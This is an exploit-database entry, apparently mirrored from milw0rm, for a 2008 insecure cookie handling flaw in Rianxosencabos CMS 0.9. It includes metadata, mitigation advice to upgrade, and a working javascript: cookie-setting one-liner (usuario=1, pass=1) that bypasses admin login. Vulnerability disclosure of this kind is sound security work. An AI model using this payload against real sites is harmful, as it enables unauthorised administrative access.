header-logo
Suggest Exploit
vendor:
Rianxosencabos CMS
by:
Stack
7.5
CVSS
HIGH
Insecure Cookie Handling
614
CWE
Product Name: Rianxosencabos CMS
Affected Version From: 0.9
Affected Version To: 0.9
Patch Exists: YES
Related CWE: N/A
CPE: a:rianxosencabos:rianxosencabos_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Rianxosencabos CMS 0.9 Insecure Cookie Handling Vulnerability

Rianxosencabos CMS 0.9 is vulnerable to an insecure cookie handling vulnerability. This vulnerability allows an attacker to gain access to the admin panel of the CMS. The attacker can exploit this vulnerability by setting the cookie values of the usuario and pass parameters to 1.

Mitigation:

Upgrade to the latest version of Rianxosencabos CMS.
Source

Exploit-DB raw data:

###############################################################################################
[+]   Rianxosencabos CMS 0.9 Insecure Cookie Handling Vulnerability
[+] Discovered By Stack                
[+] Greetz : All my freind               
################################################################################################
---
exploit:
javascript:document.cookie = "usuario=1; path=/"; document.cookie = "pass=1; path=/";

# milw0rm.com [2008-09-21]

Navigation

Suggest Exploit

Services By CQR